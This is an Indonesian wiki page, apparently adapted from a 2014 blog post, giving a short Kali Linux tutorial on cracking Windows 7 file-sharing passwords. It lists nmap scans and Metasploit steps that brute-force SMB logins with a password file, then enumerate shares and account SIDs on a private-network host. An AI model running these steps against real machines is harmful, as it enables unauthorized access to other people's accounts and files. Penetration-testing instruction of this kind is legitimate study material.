Kali Linux: Membobol File Sharing Password di Windows 7

From OnnoWiki
Revision as of 07:48, 11 February 2016 by Onnowpurbo (talk | contribs)
Jump to navigation Jump to search

Sumber: https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/



Scan Jaringan

Contoh

nmap -sS  -A -O  192.168.0.7
nmap -sS  -A -O  192.168.0.0/24
nmap -sS  -A -O  192.168.0.7,90


Hack Password

Menggunakan cara bruteforce untuk hack password. Cara ini cukup "ribut" karena semua kegiatan kita akan dicatat / di log oleh server, sehingga akan ketahuan.


msfconsole thankyou
use auxiliary/scanner/smb/smb_login
show options
set RHOSTS 192.168.31.2
set SMBUser sathish
set PASS_FILE  ‘/home/sathish/password’
set THREADS 10
run



use auxiliary/scanner/smb/smb_enumshares
show options
set RHOSTS 192.168.31.2
set SMBUser sathish
set SMBPass bhuvi
set THREADS 10
run


use auxiliary/scanner/smb/smb_lookupsid
show options
set RHOSTS 192.168.31.2
set SMBPass bhuvi
set SMBUser sathish
run


Referensi